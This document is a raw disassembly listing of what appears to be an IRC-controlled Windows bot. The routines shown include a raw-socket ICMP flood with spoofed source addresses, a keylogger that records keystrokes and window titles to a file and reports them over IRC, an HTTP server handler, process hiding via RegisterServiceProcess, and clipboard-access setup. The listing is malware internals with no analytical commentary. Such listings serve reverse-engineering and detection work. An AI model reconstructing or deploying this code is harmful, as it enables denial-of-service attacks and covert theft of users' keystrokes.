lea edi, [ebp+var_18F0]
rep stosd
push 1000h
lea eax, [ebp+var_28F0]
push eax
push esi
call dword_43A304 ; recv
test eax, eax
jg short loc_405734
push esi
call dword_43A4B0 ; closesocket
xor eax, eax
cmp [ebp+var_128], eax
jbe loc_4058DB
loc_4056F8: ; CODE XREF: sub_405549+1BF�j
cmp [ebp+eax*4+var_124], esi
jz short loc_40571E
inc eax
cmp eax, [ebp+var_128]
jb short loc_4056F8
jmp loc_4058DB
; ---------------------------------------------------------------------------
loc_40570F: ; CODE XREF: sub_405549+1DE�j
mov ecx, [ebp+eax*4+var_120]
mov [ebp+eax*4+var_124], ecx
inc eax
loc_40571E: ; CODE XREF: sub_405549+1B6�j
mov ecx, [ebp+var_128]
dec ecx
cmp eax, ecx
jb short loc_40570F
dec [ebp+var_128]
jmp loc_4058DB
; ---------------------------------------------------------------------------
loc_405734: ; CODE XREF: sub_405549+198�j
push 41h
xor eax, eax
pop ecx
lea edi, [ebp+var_340]
rep stosd
lea eax, [ebp+var_28F0]
xor ebx, ebx
xor esi, esi
lea ecx, [eax+1]
loc_40574E: ; CODE XREF: sub_405549+20A�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40574E
sub eax, ecx
mov [ebp+var_C], eax
jz loc_4058D8
loc_405760: ; CODE XREF: sub_405549+2D0�j
mov al, [ebp+ebx+var_28F0]
cmp al, 0Ah
mov [ebp+esi+var_18F0], al
jnz loc_405803
mov esi, offset aGet ; "GET "
lea eax, [ebp+var_18F0]
push esi
push eax
call sub_4173D0
test eax, eax
pop ecx
pop ecx
jz short loc_4057DD
lea eax, [ebp+var_18F0]
lea edx, [eax+1]
loc_405797: ; CODE XREF: sub_405549+253�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_405797
sub eax, edx
cmp eax, 5
jbe short loc_4057DD
mov eax, offset asc_422B08 ; " "
push eax
push eax
lea eax, [ebp+var_18F0]
push esi
push eax
call sub_4173D0
pop ecx
pop ecx
push eax
call sub_4173D0
pop ecx
pop ecx
push eax
call sub_417779
pop ecx
pop ecx
lea edx, [ebp+var_340]
loc_4057D1: ; CODE XREF: sub_405549+290�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_4057D1
jmp short loc_4057F1
; ---------------------------------------------------------------------------
loc_4057DD: ; CODE XREF: sub_405549+243�j
; sub_405549+25A�j
push 3
mov edi, offset asc_4239F0 ; "\r\n"
lea esi, [ebp+var_18F0]
pop ecx
xor eax, eax
repe cmpsb
jz short loc_405824
loc_4057F1: ; CODE XREF: sub_405549+292�j
xor eax, eax
mov ecx, 400h
lea edi, [ebp+var_18F0]
rep stosd
or esi, 0FFFFFFFFh
loc_405803: ; CODE XREF: sub_405549+227�j
lea eax, [ebp+var_28F0]
inc ebx
inc esi
lea ecx, [eax+1]
loc_40580E: ; CODE XREF: sub_405549+2CA�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40580E
sub eax, ecx
cmp ebx, eax
jb loc_405760
jmp loc_4058D8
; ---------------------------------------------------------------------------
loc_405824: ; CODE XREF: sub_405549+2A6�j
mov ecx, [ebp+var_128]
xor eax, eax
test ecx, ecx
jbe short loc_405863
loc_405830: ; CODE XREF: sub_405549+2F6�j
mov edx, [ebp+eax*4+var_124]
cmp edx, [ebp+arg_0]
jz short loc_405858
inc eax
cmp eax, ecx
jb short loc_405830
jmp short loc_405863
; ---------------------------------------------------------------------------
loc_405843: ; CODE XREF: sub_405549+312�j
mov ecx, [ebp+eax*4+var_120]
mov [ebp+eax*4+var_124], ecx
mov ecx, [ebp+var_128]
inc eax
loc_405858: ; CODE XREF: sub_405549+2F1�j
dec ecx
cmp eax, ecx
jb short loc_405843
dec [ebp+var_128]
loc_405863: ; CODE XREF: sub_405549+2E5�j
; sub_405549+2F8�j
lea eax, [ebp+var_340]
lea edx, [eax+1]
loc_40586C: ; CODE XREF: sub_405549+328�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40586C
sub eax, edx
mov esi, eax
lea eax, [ebp+var_464]
lea ecx, [eax+1]
loc_405880: ; CODE XREF: sub_405549+33C�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_405880
sub eax, ecx
add eax, esi
cmp eax, 104h
jnb short loc_4058CF
and [ebp+var_C], 0
lea eax, [ebp+var_C]
push eax
push 8004667Eh
push [ebp+arg_0]
call dword_43A334 ; ioctlsocket
push [ebp+var_358]
lea eax, [ebp+var_340]
push [ebp+var_34C]
push eax
lea eax, [ebp+var_464]
push eax
push [ebp+arg_0]
call sub_40528F
add esp, 14h
jmp short loc_4058D8
; ---------------------------------------------------------------------------
loc_4058CF: ; CODE XREF: sub_405549+347�j
push [ebp+arg_0]
call dword_43A4B0 ; closesocket
loc_4058D8: ; CODE XREF: sub_405549+211�j
; sub_405549+2D6�j ...
mov ebx, [ebp+var_8]
loc_4058DB: ; CODE XREF: sub_405549+FA�j
; sub_405549+120�j ...
mov esi, [ebp+arg_0]
inc esi
cmp esi, [ebp+var_4]
mov [ebp+arg_0], esi
jbe loc_405633
push 41h
xor eax, eax
pop ecx
push eax
push eax
push eax
lea eax, [ebp+var_23C]
push eax
mov eax, [ebp+var_4]
inc eax
loc_4058FE: ; CODE XREF: sub_405549+E0�j
lea esi, [ebp+var_128]
lea edi, [ebp+var_23C]
push eax
rep movsd
call dword_43A448 ; select
cmp eax, 0FFFFFFFFh
jnz loc_40562E
loc_40591C: ; CODE XREF: sub_405549+66�j
; sub_405549+8D�j ...
call dword_43A45C ; WSAGetLastError
push eax
lea eax, [ebp+var_8F0]
push offset aHttpdErrorServ ; "[HTTPD]: Error: server failed, returned"...
push eax
call sub_416905
xor esi, esi
add esp, 0Ch
cmp [ebp+var_350], esi
jnz short loc_405964
push esi
push [ebp+var_354]
lea eax, [ebp+var_8F0]
push eax
lea eax, [ebp+var_6EC]
push eax
push [ebp+var_6F0]
call sub_405D20
add esp, 14h
loc_405964: ; CODE XREF: sub_405549+3F6�j
lea eax, [ebp+var_8F0]
push eax
call sub_401ECD
pop ecx
push ebx
call dword_43A4B0 ; closesocket
push [ebp+var_358]
call sub_41397A
pop ecx
push esi
call dword_422010 ; ExitThread
int 3 ; Trap to Debugger
sub_405549 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_40598C proc near ; DATA XREF: sub_409806+300E�o
var_3BC = byte ptr -3BCh
var_1BC = dword ptr -1BCh
var_1B8 = byte ptr -1B8h
var_138 = byte ptr -138h
var_B8 = byte ptr -0B8h
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3BCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 68h
pop ecx
mov esi, eax
lea edi, [ebp+var_1BC]
rep movsd
push 0FFh
xor esi, esi
push 3
inc esi
push 2
mov [eax+19Ch], esi
call dword_43A39C ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_4059F3
call dword_43A45C ; WSAGetLastError
push eax
lea eax, [ebp+var_3BC]
push offset aIcmpErrorSocke ; "[ICMP]: Error: socket() failed, returne"...
push eax
call sub_416905
add esp, 0Ch
xor esi, esi
loc_4059E5: ; CODE XREF: sub_40598C+9C�j
; sub_40598C+C3�j
cmp [ebp+var_24], esi
jnz loc_405C47
jmp loc_405C27
; ---------------------------------------------------------------------------
loc_4059F3: ; CODE XREF: sub_40598C+3A�j
push 4
lea ecx, [ebp+var_C]
push ecx
mov [ebp+var_C], esi
push 2
xor esi, esi
push esi
push eax
call dword_43A3B8 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_405A2A
call dword_43A45C ; WSAGetLastError
push eax
lea eax, [ebp+var_3BC]
push offset aIcmpErrorSetso ; "[ICMP]: Error: setsockopt() failed, ret"...
push eax
call sub_416905
add esp, 0Ch
jmp short loc_4059E5
; ---------------------------------------------------------------------------
loc_405A2A: ; CODE XREF: sub_40598C+7F�j
lea eax, [ebp+var_1B8]
push eax
call dword_43A414 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_405A51
lea eax, [ebp+var_3BC]
push offset aIcmpInvalidTar ; "[ICMP]: Invalid target IP."
push eax
call sub_416905
pop ecx
pop ecx
jmp short loc_4059E5
; ---------------------------------------------------------------------------
loc_405A51: ; CODE XREF: sub_40598C+AE�j
xor eax, eax
lea edi, [ebp+var_1C]
stosd
stosd
stosd
stosd
push esi
mov [ebp+var_1C], 2
call dword_43A4F4 ; ntohs
mov [ebp+var_1A], ax
lea eax, [ebp+var_1B8]
push eax
call dword_43A414 ; inet_addr
mov ebx, dword_42201C
mov [ebp+var_18], eax
mov [ebp+arg_0], esi
call ebx ; GetTickCount
mov [ebp+var_8], eax
call ebx ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_30]
ja loc_405BDF
mov esi, 100h
loc_405AA5: ; CODE XREF: sub_40598C+24B�j
push 41Ch
mov byte_439EE8, 45h
call dword_43A4F4 ; ntohs
mov word_439EEA, ax
xor eax, eax
cmp [ebp+var_2C], eax
mov word_439EEC, 1
mov word_439EEE, ax
mov byte_439EF0, 80h
mov byte_439EF1, 1
mov word_439EF2, ax
jz short loc_405B14
call sub_41699A
mov edi, eax
shl edi, 8
call sub_41699A
add edi, eax
shl edi, 8
call sub_41699A
add edi, eax
shl edi, 8
call sub_41699A
add edi, eax
mov dword_439EF4, edi
jmp short loc_405B2C
; ---------------------------------------------------------------------------
loc_405B14: ; CODE XREF: sub_40598C+159�j
push [ebp+var_1BC]
call sub_408852
pop ecx
push eax
call dword_43A414 ; inet_addr
mov dword_439EF4, eax
loc_405B2C: ; CODE XREF: sub_40598C+186�j
mov eax, [ebp+var_18]
mov dword_439EF8, eax
call sub_41699A
cdq
mov ecx, esi
idiv ecx
mov byte_439EFC, dl
call sub_41699A
cdq
mov ecx, esi
idiv ecx
mov byte_439EFD, dl
call sub_41699A
cdq
mov ecx, 0F0h
idiv ecx
and word_439EFE, 0
mov word_439F02, 1
inc edx
mov word_439F00, dx
call sub_41699A
cdq
mov ecx, 0FFh
idiv ecx
push 10h
mov edi, offset dword_439F04
mov al, dl
mov cl, al
mov ch, cl
mov eax, ecx
shl eax, 10h
mov ax, cx
mov ecx, esi
rep stosd
lea eax, [ebp+var_1C]
push eax
xor edi, edi
push edi
push 41Ch
push offset byte_439EE8
push [ebp+var_4]
call dword_43A36C ; sendto
cmp eax, 0FFFFFFFFh
jz loc_405C64
inc [ebp+arg_0]
call ebx ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_30]
jbe loc_405AA5
xor esi, esi
loc_405BDF: ; CODE XREF: sub_40598C+10E�j
push [ebp+var_4]
call dword_43A4B0 ; closesocket
mov eax, [ebp+arg_0]
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
xor edx, edx
div [ebp+var_30]
shr ecx, 14h
push ecx
push eax
push [ebp+arg_0]
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_138]
push eax
lea eax, [ebp+var_3BC]
push offset aIcmpDoneWithSF ; "[ICMP]: Done with %s flood to IP: %s. S"...
push eax
call sub_416905
add esp, 1Ch
cmp [ebp+var_24], esi
jnz short loc_405C47
loc_405C27: ; CODE XREF: sub_40598C+62�j
push esi
push [ebp+var_28]
lea eax, [ebp+var_3BC]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_405D20
add esp, 14h
loc_405C47: ; CODE XREF: sub_40598C+5C�j
; sub_40598C+299�j
lea eax, [ebp+var_3BC]
push eax
call sub_401ECD
push [ebp+var_38]
call sub_41397A
pop ecx
pop ecx
push esi
loc_405C5E: ; CODE XREF: sub_40598C+347�j
call dword_422010 ; ExitThread
loc_405C64: ; CODE XREF: sub_40598C+231�j
push [ebp+var_4]
call dword_43A4B0 ; closesocket
call dword_43A45C ; WSAGetLastError
push eax
push [ebp+arg_0]
lea eax, [ebp+var_1B8]
push eax
push offset aIcmpErrorSendi ; "[ICMP]: Error sending packets to IP: %s"...
lea eax, [ebp+var_3BC]
push 200h
push eax
call sub_416B5D
add esp, 18h
cmp [ebp+var_24], edi
jnz short loc_405CBC
push edi
push [ebp+var_28]
lea eax, [ebp+var_3BC]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_405D20
add esp, 14h
loc_405CBC: ; CODE XREF: sub_40598C+30E�j
lea eax, [ebp+var_3BC]
push eax
call sub_401ECD
push [ebp+var_38]
call sub_41397A
pop ecx
pop ecx
push edi
jmp short loc_405C5E
sub_40598C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405CD5 proc near ; CODE XREF: sub_40942B+40�p
; sub_409806+1B8�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_200]
push 200h
push eax
call sub_416BB4
lea eax, [ebp+var_200]
add esp, 10h
lea edx, [eax+1]
loc_405D02: ; CODE XREF: sub_405CD5+32�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_405D02
push 0
sub eax, edx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call dword_43A438 ; send
leave
retn
sub_405CD5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405D20 proc near ; CODE XREF: start+B2�p sub_4010CA+61�p ...
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 400h
cmp [ebp+arg_C], 0
push esi
push edi
mov edi, offset aNotice ; "NOTICE"
jnz short loc_405D3B
mov edi, offset aPrivmsg ; "PRIVMSG"
loc_405D3B: ; CODE XREF: sub_405D20+14�j
mov eax, edi
lea edx, [eax+1]
loc_405D40: ; CODE XREF: sub_405D20+25�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_405D40
sub eax, edx
mov esi, eax
mov eax, [ebp+arg_4]
lea ecx, [eax+1]
loc_405D51: ; CODE XREF: sub_405D20+36�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_405D51
push [ebp+arg_8]
sub eax, ecx
mov ecx, 1FAh
sub ecx, eax
push offset aS_3 ; "%s"
sub ecx, esi
push ecx
lea eax, [ebp+var_400]
push eax
call sub_416B5D
lea eax, [ebp+var_400]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_200]
push edi
push offset aSSS ; "%s %s :%s\r\n"
push eax
call sub_416905
add esp, 24h
lea eax, [ebp+var_200]
pop edi
lea ecx, [eax+1]
pop esi
loc_405DA2: ; CODE XREF: sub_405D20+87�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_405DA2
push 0
sub eax, ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call dword_43A438 ; send
cmp [ebp+arg_10], 0
jz short locret_405DCF
push 0FAh
call dword_422000 ; Sleep
locret_405DCF: ; CODE XREF: sub_405D20+A2�j
leave
retn
sub_405D20 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405DD1 proc near ; CODE XREF: sub_405ED4+B0�p
; sub_405ED4+24B�p
var_314 = byte ptr -314h
var_114 = byte ptr -114h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = byte ptr 14h
arg_8C = dword ptr 94h
arg_90 = dword ptr 98h
push ebp
mov ebp, esp
sub esp, 314h
push esi
push edi
lea eax, [ebp+var_10]
push eax
call dword_422028 ; GetLocalTime
push 104h
lea eax, [ebp+var_114]
push eax
call dword_422048 ; GetSystemDirectoryA
lea edi, [ebp+var_114]
dec edi
loc_405DFF: ; CODE XREF: sub_405DD1+34�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_405DFF
mov esi, offset asc_423B68 ; "\\"
mov eax, offset dword_42FD58
movsw
mov edx, eax
loc_405E15: ; CODE XREF: sub_405DD1+49�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_405E15
lea edi, [ebp+var_114]
sub eax, edx
dec edi
loc_405E25: ; CODE XREF: sub_405DD1+5A�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_405E25
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
lea eax, [ebp+var_114]
and ecx, 3
push offset aAb ; "ab"
push eax
rep movsb
call sub_41719C
mov esi, eax
test esi, esi
pop ecx
pop ecx
jnz short loc_405E59
inc eax
jmp short loc_405ED0
; ---------------------------------------------------------------------------
loc_405E59: ; CODE XREF: sub_405DD1+83�j
push [ebp+arg_0]
movzx eax, [ebp+var_4]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset aDDDDDDS ; "[%d-%d-%d %d:%d:%d] %s\r\n"
push esi
call sub_417834
push esi
call sub_416E0D
add esp, 28h
cmp [ebp+arg_90], 0
jnz short loc_405ECE
push [ebp+arg_0]
lea eax, [ebp+var_314]
push offset aKeylogS ; "[KEYLOG]: %s"
push 200h
push eax
call sub_416B5D
push 0
push [ebp+arg_8C]
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+arg_C]
push eax
push [ebp+arg_4]
call sub_405D20
add esp, 24h
loc_405ECE: ; CODE XREF: sub_405DD1+C4�j
xor eax, eax
loc_405ED0: ; CODE XREF: sub_405DD1+86�j
pop edi
pop esi
leave
retn
sub_405DD1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_405ED4 proc near ; DATA XREF: sub_409806+1E2F�o
var_8E0 = dword ptr -8E0h
var_8DC = byte ptr -8DCh
var_4E0 = byte ptr -4E0h
var_2E1 = byte ptr -2E1h
var_2E0 = byte ptr -2E0h
var_E0 = byte ptr -0E0h
var_DC = dword ptr -0DCh
var_4C = byte ptr -4Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 8E0h
mov eax, [ebp+74h+arg_0]
and [ebp+74h+var_8E0], 0
and [ebp+74h+var_4], 0
push ebx
push esi
push edi
push 25h
mov esi, eax
pop ecx
lea edi, [ebp+74h+var_E0]
rep movsd
mov dword ptr [eax+90h], 1
xor eax, eax
mov ecx, 0FFh
lea edi, [ebp+74h+var_8DC]
rep stosd
call dword_43A360 ; GetForegroundWindow
push 3Ch
lea ecx, [ebp+74h+var_4C]
push ecx
push eax
mov [ebp+74h+var_8], eax
call dword_43A350 ; GetWindowTextA
mov ebx, 80h
loc_405F2E: ; CODE XREF: sub_405ED4+2E9�j
push 8
call dword_422000 ; Sleep
call dword_43A360 ; GetForegroundWindow
cmp eax, [ebp+74h+var_8]
jz short loc_405FA8
push 3Ch
lea ecx, [ebp+74h+var_4C]
push ecx
push eax
mov [ebp+74h+var_8], eax
call dword_43A350 ; GetWindowTextA
lea eax, [ebp+74h+var_4C]
push eax
lea eax, [ebp+74h+var_2E0]
push eax
lea eax, [ebp+74h+var_4E0]
push offset aSChangedWindow ; "%s (Changed Windows: %s)"
push eax
call sub_416905
sub esp, 84h
push 25h
pop ecx
lea eax, [ebp+74h+var_4E0]
mov edi, esp
lea esi, [ebp+74h+var_E0]
push eax
rep movsd
call sub_405DD1
add esp, 98h
mov [ebp+74h+var_4], eax
xor eax, eax
mov ecx, ebx
lea edi, [ebp+74h+var_2E0]
rep stosd
mov ecx, ebx
lea edi, [ebp+74h+var_4E0]
rep stosd
loc_405FA8: ; CODE XREF: sub_405ED4+6B�j
mov [ebp+74h+arg_0], offset dword_42E59C
loc_405FAF: ; CODE XREF: sub_405ED4+2DF�j
push 10h
call dword_43A4C4 ; GetKeyState
movsx edi, ax
mov eax, [ebp+74h+arg_0]
mov esi, [eax-4]
push esi
call dword_43A340 ; GetAsyncKeyState
test ah, ah
jns short loc_406046
push 14h
call dword_43A4C4 ; GetKeyState
test ax, ax
jz short loc_405FF7
cmp edi, 0FFFFFFFFh
jle short loc_405FF7
cmp esi, 40h
jle short loc_405FF7
cmp esi, 5Bh
jge short loc_405FF7
mov [ebp+esi*4+74h+var_8E0], 1
jmp loc_4061A8
; ---------------------------------------------------------------------------
loc_405FF7: ; CODE XREF: sub_405ED4+102�j
; sub_405ED4+107�j ...
push 14h
call dword_43A4C4 ; GetKeyState
test ax, ax
jz short loc_406022
test edi, edi
jge short loc_406036
cmp esi, 40h
jle short loc_406022
cmp esi, 5Bh
jge short loc_406022
mov [ebp+esi*4+74h+var_8E0], 2
jmp loc_4061A8
; ---------------------------------------------------------------------------
loc_406022: ; CODE XREF: sub_405ED4+12E�j
; sub_405ED4+137�j ...
test edi, edi
jge short loc_406036
mov [ebp+esi*4+74h+var_8E0], 3
jmp loc_4061A8
; ---------------------------------------------------------------------------
loc_406036: ; CODE XREF: sub_405ED4+132�j
; sub_405ED4+150�j
mov [ebp+esi*4+74h+var_8E0], 4
jmp loc_4061A8
; ---------------------------------------------------------------------------
loc_406046: ; CODE XREF: sub_405ED4+F5�j
lea eax, [ebp+esi*4+74h+var_8E0]
mov edx, [eax]
test edx, edx
jz loc_4061A8
and dword ptr [eax], 0
cmp esi, 8
lea eax, [ebp+74h+var_2E0]
jnz short loc_40607D
lea edx, [eax+1]
loc_406068: ; CODE XREF: sub_405ED4+199�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_406068
sub eax, edx
and [ebp+eax+74h+var_2E1], cl
jmp loc_4061A8
; ---------------------------------------------------------------------------
loc_40607D: ; CODE XREF: sub_405ED4+18F�j
lea edi, [eax+1]
loc_406080: ; CODE XREF: sub_405ED4+1B1�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_406080
sub eax, edi
cmp eax, 1B9h
jbe short loc_4060B5
call dword_43A360 ; GetForegroundWindow
push 3Ch
lea ecx, [ebp+74h+var_4C]
push ecx
push eax
call dword_43A350 ; GetWindowTextA
lea eax, [ebp+74h+var_4C]
push eax
lea eax, [ebp+74h+var_2E0]
push eax
push offset aSBufferFullS ; "%s (Buffer full) (%s)"
jmp short loc_4060FC
; ---------------------------------------------------------------------------
loc_4060B5: ; CODE XREF: sub_405ED4+1BA�j
cmp esi, 0Dh
jnz loc_406145
lea eax, [ebp+74h+var_2E0]
lea edx, [eax+1]
loc_4060C7: ; CODE XREF: sub_405ED4+1F8�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4060C7
sub eax, edx
mov [ebp+74h+var_C], eax
jz loc_4061A8
call dword_43A360 ; GetForegroundWindow
push 3Ch
lea ecx, [ebp+74h+var_4C]
push ecx
push eax
call dword_43A350 ; GetWindowTextA
lea eax, [ebp+74h+var_4C]
push eax
lea eax, [ebp+74h+var_2E0]
push eax
push offset aSReturnS ; "%s (Return) (%s)"
loc_4060FC: ; CODE XREF: sub_405ED4+1DF�j
lea eax, [ebp+74h+var_4E0]
push eax
call sub_416905
sub esp, 84h
push 25h
pop ecx
lea eax, [ebp+74h+var_4E0]
mov edi, esp
lea esi, [ebp+74h+var_E0]
push eax
rep movsd
call sub_405DD1
add esp, 98h
mov [ebp+74h+var_4], eax
xor eax, eax
mov ecx, ebx
lea edi, [ebp+74h+var_2E0]
rep stosd
mov ecx, ebx
lea edi, [ebp+74h+var_4E0]
rep stosd
jmp short loc_4061A8
; ---------------------------------------------------------------------------
loc_406145: ; CODE XREF: sub_405ED4+1E4�j
cmp edx, 1
jz short loc_406178
cmp edx, 3
jz short loc_406178
cmp edx, 2
jz short loc_406159
cmp edx, 4
jnz short loc_4061A8
loc_406159: ; CODE XREF: sub_405ED4+27E�j
mov eax, [ebp+74h+arg_0]
mov edx, eax
loc_40615E: ; CODE XREF: sub_405ED4+28F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40615E
lea edi, [ebp+74h+var_2E0]
sub eax, edx
dec edi
loc_40616E: ; CODE XREF: sub_405ED4+2A0�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40616E
jmp short loc_406198
; ---------------------------------------------------------------------------
loc_406178: ; CODE XREF: sub_405ED4+274�j
; sub_405ED4+279�j
mov eax, [ebp+74h+arg_0]
add eax, 7
mov edx, eax
loc_406180: ; CODE XREF: sub_405ED4+2B1�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_406180
lea edi, [ebp+74h+var_2E0]
sub eax, edx
dec edi
loc_406190: ; CODE XREF: sub_405ED4+2C2�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_406190
loc_406198: ; CODE XREF: sub_405ED4+2A2�j
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
loc_4061A8: ; CODE XREF: sub_405ED4+11E�j
; sub_405ED4+149�j ...
add [ebp+74h+arg_0], 14h
cmp [ebp+74h+arg_0], offset dword_42ECCC
jl loc_405FAF
cmp [ebp+74h+var_4], 0
jz loc_405F2E
push [ebp+74h+var_DC]
call sub_41397A
pop ecx
push 0
call dword_422010 ; ExitThread
int 3 ; Trap to Debugger
sub_405ED4 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4061D5 proc near ; CODE XREF: sub_40FAD0+4B�p
push ebx
push ebp
mov ebp, dword_4220A4
push esi
push edi
push offset aKernel32_dll ; "kernel32.dll"
call ebp ; GetModuleHandleA
mov esi, dword_422084
mov edi, eax
xor ebx, ebx
cmp edi, ebx
jz loc_4062F5
push offset aSeterrormode ; "SetErrorMode"
push edi
call esi ; GetProcAddress
push offset aCreatetoolhelp ; "CreateToolhelp32Snapshot"
push edi
mov dword_43A374, eax
call esi ; GetProcAddress
push offset aProcess32first ; "Process32First"
push edi
mov dword_43A38C, eax
call esi ; GetProcAddress
push offset aProcess32next ; "Process32Next"
push edi
mov dword_43A3EC, eax
call esi ; GetProcAddress
push offset aModule32first ; "Module32First"
push edi
mov dword_43A344, eax
call esi ; GetProcAddress
push offset aGetdiskfreespa ; "GetDiskFreeSpaceExA"
push edi
mov dword_43A3B4, eax
call esi ; GetProcAddress
push offset aGetlogicaldriv ; "GetLogicalDriveStringsA"
push edi
mov dword_43A398, eax
call esi ; GetProcAddress
push offset aGetdrivetypea ; "GetDriveTypeA"
push edi
mov dword_43A440, eax
call esi ; GetProcAddress
push offset aSearchpatha ; "SearchPathA"
push edi
mov dword_43A31C, eax
call esi ; GetProcAddress
push offset aQueryperforman ; "QueryPerformanceCounter"
push edi
mov dword_43A3BC, eax
call esi ; GetProcAddress
push offset aQueryperform_0 ; "QueryPerformanceFrequency"
push edi
mov dword_43A3E4, eax
call esi ; GetProcAddress
cmp dword_43A374, ebx
mov dword_43A44C, eax
jz short loc_4062D3
cmp dword_43A38C, ebx
jz short loc_4062D3
cmp dword_43A3EC, ebx
jz short loc_4062D3
cmp dword_43A344, ebx
jz short loc_4062D3
cmp dword_43A398, ebx
jz short loc_4062D3
cmp dword_43A440, ebx
jz short loc_4062D3
cmp dword_43A31C, ebx
jz short loc_4062D3
cmp dword_43A3BC, ebx
jz short loc_4062D3
cmp dword_43A3E4, ebx
jz short loc_4062D3
cmp eax, ebx
jnz short loc_4062DD
loc_4062D3: ; CODE XREF: sub_4061D5+B8�j
; sub_4061D5+C0�j ...
mov dword_43A4F8, 1
loc_4062DD: ; CODE XREF: sub_4061D5+FC�j
push offset aRegisterservic ; "RegisterServiceProcess"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov dword_43A4A0, eax
jz short loc_40630A
push 1
push ebx
call eax
jmp short loc_40630A
; ---------------------------------------------------------------------------
loc_4062F5: ; CODE XREF: sub_4061D5+1D�j
call dword_422004 ; RtlGetLastWin32Error
mov dword_43A4FC, eax
mov dword_43A4F8, 1
loc_40630A: ; CODE XREF: sub_4061D5+117�j
; sub_4061D5+11E�j
push offset aUser32_dll ; "user32.dll"
call dword_422088 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40641F
push offset aSendmessagea ; "SendMessageA"
push edi
call esi ; GetProcAddress
push offset aFindwindowa ; "FindWindowA"
push edi
mov dword_43A464, eax
call esi ; GetProcAddress
push offset aIswindow ; "IsWindow"
push edi
mov dword_43A3F8, eax
call esi ; GetProcAddress
push offset aDestroywindow ; "DestroyWindow"
push edi
mov dword_43A324, eax
call esi ; GetProcAddress
push offset aOpenclipboard ; "OpenClipboard"
push edi
mov dword_43A394, eax
call esi ; GetProcAddress
push offset aGetclipboardda ; "GetClipboardData"
push edi
mov dword_43A33C, eax
call esi ; GetProcAddress
push offset aCloseclipboard ; "CloseClipboard"
push edi
mov dword_43A4D4, eax
call esi ; GetProcAddress
push offset aExitwindowsex ; "ExitWindowsEx"
push edi
mov dword_43A320, eax
call esi ; GetProcAddress
cmp dword_43A464, ebx
mov dword_43A43C, eax
jz short loc_4063C3
cmp dword_43A3F8, ebx
jz short loc_4063C3
cmp dword_43A324, ebx
jz short loc_4063C3
cmp dword_43A394, ebx
jz short loc_4063C3
